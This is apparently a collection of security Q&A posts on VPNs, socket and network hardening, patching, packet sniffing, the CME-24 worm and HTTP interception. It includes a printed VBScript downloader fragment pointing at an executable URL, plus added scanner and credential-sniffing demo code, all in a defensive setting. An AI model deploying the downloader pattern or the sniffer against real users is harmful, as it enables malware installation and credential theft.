Q: Cisco Site to Site VPN

A new week, a new question. This one is a bit more generic and, I believe, raises a few dilemmas; feel free to take a shot at it:

Hi Experts,

Is it secure to just configure a Cisco IPsec/GRE site-to-site tunnel without a firewall/IPS/IDS? The argument here is that although it is internet-facing, there is only host-to-host routing between the routers and the default route goes to the tunnel. Am I right to say that it is technically secure, since the router only routes traffic between the designated routers?

Thanks in advance.

J. O.


Q: Socket Security

A new question for you guys – you have been great answering the previous one:
Hi, I’m a bit new to Java and socket programming.
Anyway, I just wrote a client/server socket program and I have an open port listening on my Unix box.

I was told that this is vulnerable because now anyone could write a client side program to my open port and send in whatever command line they want.

I am not sure where to go to research what security measures I need to put in place for socket programming.



Q: Network Monitoring

Dear Expert,

I am a Network Engineer at the University of Anonymous. I’m not sure if this is an irrelevant question, but here it is anyway.

I want to have a Network Monitoring Software with the following characteristics

1 – I want to be able to monitor all the active workstations in each of the labs.
2 – I want to have a list of trusted MAC addresses. I need this because I want to block any non-trusted device from accessing network resources. Exceptions might be given when the device is verified to be secure.
3 – I want to be able to detect any suspicious activities (pinging, high traffic) and block the associated IP address.

So please tell me if there is any software or combination of software that enables me to do what I want.

I hope I will hear from you soon



Our readers were very helpful to the person who wrote the previous post, and I believe they have the answer in this case as well; as in the previous case, the combined answer was far better than anything we could have provided.

So I am going to let our readers answer this interesting question. Readers – what do you say?


Q: Restricted user rights and vulnerabilities

Dear Expert,

I know that a restricted user is less vulnerable to most exploits, but is knowing that your users have restricted access enough of a reason NOT to patch? I am advocating that my IT support team update/patch the following software for our end users: QuickTime, Java, Adobe Reader and Acrobat. Currently all of our installed versions have multiple known vulnerabilities. I am being told patching is unnecessary because 95% of our users have restricted user rights and therefore cannot be exploited.

Will you please clarify? I understand how restricted user rights increase security, but is that enough of a layer to justify not patching? When I inquired about scanning thumb drives, this same answer is given: “It is not necessary because the users have restricted rights.” Many of our users have access to confidential and sensitive data and I remain concerned. I really appreciate any assistance that you can provide on this issue. Thank you for your help.

Anonymous University

A: I am going to let our readers answer this interesting question. Readers – what do you say?


Malware utilizes AJAX to install itself

One of our customers has brought this HTML-based malware to our attention. Despite the heading and the author's own comment, there is no AJAX here: the script is VBScript that instantiates a COM object by classid and uses it to fetch and run an executable:

[script language="VBScript"]
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
' clsid BD96C556-65A3-11D0-983A-00C04FC29E36 is RDS.DataSpace (MDAC), the object
' abused by MS06-014-style downloaders to instantiate ADODB.Stream and friends
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject(str,"")
' the sample as received ends here; str is never assigned in the fragment
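To show how a gateway or mail filter would catch this family of pages, here is a small static scanner written for this article (it is not part of the customer's sample or of any product). The CLSID constant is the one in the snippet above, which belongs to RDS.DataSpace; every other indicator (the VBScript block, the error-suppressing `on error resume next`, a `CreateObject` call, a URL ending in an executable extension) is this example's own heuristic, and both input pages are constructed here.

```python
# Added example, not part of the original post: a static scanner for the
# RDS.DataSpace drive-by pattern shown above.  The CLSID is the one in the
# sample (RDS.DataSpace, the MDAC object abused by MS06-014-style downloaders);
# all other indicators are this example's own heuristics.
import re

RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

CLSID_RE = re.compile(
    r"clsid:\s*\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?",
    re.I)
CREATEOBJECT_RE = re.compile(r"\bCreateObject\s*\(", re.I)
EXE_URL_RE = re.compile(r"https?://[^\s\"'<>]+\.(?:exe|scr|pif|bat|cmd)\b", re.I)
VBSCRIPT_RE = re.compile(r"<script[^>]*language\s*=\s*[\"']?vbscript", re.I)
ON_ERROR_RE = re.compile(r"\bon\s+error\s+resume\s+next\b", re.I)


def scan_html(html):
    """Return the list of indicator strings found in html (empty if none)."""
    findings = []
    for m in CLSID_RE.finditer(html):
        if m.group(1).upper() == RDS_DATASPACE_CLSID:
            findings.append("rds_dataspace_clsid")
        else:
            findings.append("other_clsid:" + m.group(1).upper())
    if VBSCRIPT_RE.search(html):
        findings.append("vbscript_block")
    if ON_ERROR_RE.search(html):
        # exploit pages suppress errors so a failed attempt stays silent
        findings.append("on_error_resume_next")
    if CREATEOBJECT_RE.search(html):
        findings.append("createobject_call")
    for m in EXE_URL_RE.finditer(html):
        findings.append("executable_url:" + m.group(0))
    return findings


def is_driveby(html):
    """Decision rule: RDS.DataSpace present and either a CreateObject call
    or an executable URL.  Anything less is reported but not blocked."""
    f = scan_html(html)
    return "rds_dataspace_clsid" in f and (
        "createobject_call" in f or any(x.startswith("executable_url:") for x in f))


# Constructed input: the page's sample, with straight quotes and a real <script> tag.
SAMPLE = """<script language="VBScript">
on error resume next
' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"
' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject(str,"")
</script>"""

# Constructed benign page: an <object> with an unrelated CLSID and no download.
BENIGN = """<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000" width="1" height="1"></object>
<script language="JavaScript">document.title = "hello";</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, is_driveby(page), scan_html(page))
```

Pattern matching of this kind only catches the unobfuscated form; a variant that assembles the CLSID or the URL from string fragments at runtime will slip past it, which is why the real fix on the client side is the MDAC patch (MS06-014) and a kill bit for the RDS.DataSpace control rather than content filtering alone.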


Packet Sniffing


We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]

- Rob


The easiest way to encrypt data between you and the server is to use SSL/TLS or SSH. If you are connecting to a web server, enable SSL; if you are connecting to any other service that can be protected by SSL (IMAP, POP, SMTP, LDAP all can), enable it there too. One caveat before anything else: if the attackers really ran tcpdump on your own servers, they already had root on those machines, and encrypting the wire does nothing about that; find and close the hole they came in through first. Sniffing only pays off for them where a protocol is cleartext on a network segment they can see, and that is the case to design against.

If your product cannot use SSL itself, you can tunnel its traffic over OpenSSH to the destination host (ssh -L local_port:destination_host:destination_port user@destination_host, then point the client at localhost), wrap the service with stunnel, or use OpenVPN (SSL-based) to encrypt the whole connection between you and the destination host.
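As an added illustration (example code written for this page, not part of the original answer), the following script hand-builds a few IPv4/TCP packets and runs over them the kind of extraction a passive sniffer performs, so the difference between a cleartext login and a TLS stream is concrete. The addresses, credentials and packet bytes are all constructed here, and checksums are left at zero because nothing is put on the wire.

```python
# Added example, not from the original post: constructed IPv4/TCP packets show
# what a passive sniffer (tcpdump -A and friends) can lift from cleartext
# protocols and why a TLS stream gives it nothing useful.
import base64
import binascii
import struct


def build_ipv4_tcp(src, dst, sport, dport, payload):
    """Minimal IPv4 + TCP (no options, zero checksums) wrapper around payload."""
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp_hdr) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
    return ip_hdr + tcp_hdr + payload


def parse_ipv4_tcp(pkt):
    """Return (src, dst, sport, dport, payload); raises on non-IPv4/TCP input."""
    if pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6:
        raise ValueError("not TCP")
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    tcp = pkt[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_off:]


def extract_secrets(payload):
    """Heuristics a sniffer applies to one payload.  Returns {"tls": True} for a
    TLS record (only ciphertext beyond the handshake), credentials for cleartext
    HTTP Basic / FTP / POP3 style logins, and {} when nothing is recoverable."""
    # TLS record header: content type 0x16 (handshake) or 0x17 (application data)
    # followed by a 0x03xx protocol version.
    if len(payload) >= 3 and payload[0] in (0x16, 0x17) and payload[1] == 0x03:
        return {"tls": True}
    found = {}
    for line in payload.decode("latin-1").split("\r\n"):
        low = line.lower()
        if low.startswith("authorization: basic "):
            token = line.split(None, 2)[2]
            try:
                decoded = base64.b64decode(token, validate=True).decode("latin-1")
            except (binascii.Error, ValueError):
                continue
            user, _, pw = decoded.partition(":")
            found["http_basic"] = (user, pw)
        elif low.startswith("user "):      # FTP / POP3 login, sent in the clear
            found["user"] = line[5:]
        elif low.startswith("pass "):
            found["password"] = line[5:]
    return found


def sniff(packets):
    """Run the extractor over every packet; one record per packet."""
    report = []
    for pkt in packets:
        src, dst, sport, dport, payload = parse_ipv4_tcp(pkt)
        report.append({"flow": f"{src}:{sport}->{dst}:{dport}",
                       "secrets": extract_secrets(payload)})
    return report


# Constructed traffic: an HTTP request with Basic auth, an FTP login in two
# segments, and the first bytes of a TLS ClientHello (handshake record, stub body).
CREDS = base64.b64encode(b"webmaster:s3cret").decode()
CAPTURE = [
    build_ipv4_tcp("10.0.0.5", "10.0.0.80", 40001, 80,
                   ("GET /admin/ HTTP/1.1\r\nHost: www.example.com\r\n"
                    f"Authorization: Basic {CREDS}\r\n\r\n").encode()),
    build_ipv4_tcp("10.0.0.5", "10.0.0.21", 40002, 21, b"USER webmaster\r\n"),
    build_ipv4_tcp("10.0.0.5", "10.0.0.21", 40002, 21, b"PASS s3cret\r\n"),
    build_ipv4_tcp("10.0.0.5", "10.0.0.80", 40003, 443,
                   b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"),
]

if __name__ == "__main__":
    for rec in sniff(CAPTURE):
        print(rec["flow"], rec["secrets"])
```

The first three packets give up the account and password with a dozen lines of code; the TLS packet gives up only the fact that a handshake happened. Moving the web login to HTTPS and the FTP session to SFTP or an SSH tunnel is exactly the change that turns the first kind of flow into the second, which is all the encryption in the answer above buys you; it does not help if the capture point is the compromised server itself.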


CME 24


Hope you can help with this question.

If a computer is infected with CME-24, will it attempt to attack a mapped network drive?
Not just delivering its payload.




Let's first try to understand what CME-24 is. CME (Common Malware Enumeration), run by MITRE, is a relatively new standard for identifying malware so that the names different vendors give the same sample can be cross-referenced.

CME allows different vendors, such as Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, Norman, Panda, Sophos, Symantec and Trend Micro, to name the malware they identify in such a way that the user can know that the malware ‘X’ found by company A is the same malware named ‘Y’ by company B.

CME-24 has been given the following names by the different vendors:
Aladdin Knowledge Systems: Win32.Blackmal.e
Authentium: W32/Kapser.A@mm
CA: Win32/Blackmal.F
Fortinet: W32/Grew.A!wm
F-Secure: Nyxem.E
Grisoft: Worm/Generic.FX
H+BEDV: Worm/KillAV.GR
Kaspersky: Email-Worm.Win32.Nyxem.e
McAfee: W32/MyWife.d@MM
Microsoft: Win32/Mywife.E@mm!CME-24
Norman: W32/Small.KI
Panda: W32/Tearec.A.worm
Sophos: W32/Nyxem-D
Symantec: W32.Blackmal.E@mm
TrendMicro: WORM_GREW.A

Its payload: destroy certain data files on an infected user's machine on Friday, February 3, 2006 (the trigger is the 3rd of the month, so the date recurs).

According to our sources and independent analysis conducted on this worm, the code is written to destroy files on mapped drives as well. However, in the wild (ITW) the worm's payload does not function correctly on mapped drives, leaving it unable to destroy content found there. Do not rely on that: a mapped drive the infected user can write to is within the worm's reach by design, so disconnect infected hosts before the trigger date and restore any affected shares from backup.


HTTP PUT Malware


Hello -

I’m assessing the vulnerability of a web service application, and have been trying to find out whether this sort of scenario is possible, and if so, what to do about it.

Is there any sort of malware that could be installed on a user’s PC, such that it would intercept non-browser based HTTP requests (consisting of data to be PUT), send this data to a site run by the malware authors, and then issue the PUT to the intended web site? The effect being that the data is sent to the correct web site, but a copy is also sent to another location, unbeknownst to the user.

If this is possible, would HTTPS circumvent this?

I’ve searched and searched but cannot find anything addressing this.



What you are describing is essentially a proxy. A proxy receives the requests made by the user, sends them to their original destination, receives the response from the destination and relays that response back to the user; a malicious one simply keeps a copy of the request body along the way.

Using this specifically against PUT requests is the first time I have heard of it, but there is nothing that makes it impossible: any code that sees the request before it reaches the wire can store the body and still forward it intact, so the user observes nothing unusual.

For a proxy on the network – HTTPS helps, provided the client validates certificates. An intercepting proxy has to terminate the TLS session itself, so the certificate it presents to the client is not the real web site's and the client (or the user reading the warning) will notice, unless the attacker has also managed to install a certificate the client trusts.

For malware on the user's PC – HTTPS or HTTP makes no difference. Code running on the host sees the data before it is encrypted, for example by hooking the HTTP library the application uses or by routing the traffic through a local proxy whose certificate it has installed as trusted, so the copy is taken and the original is still sent to the real destination. In both cases your traffic is being read and possibly manipulated. Mozilla/IE might detect this manipulation and might not, I cannot be certain; a non-browser client, which is your case, typically performs less certificate checking than a browser, so make sure it verifies the server certificate at all.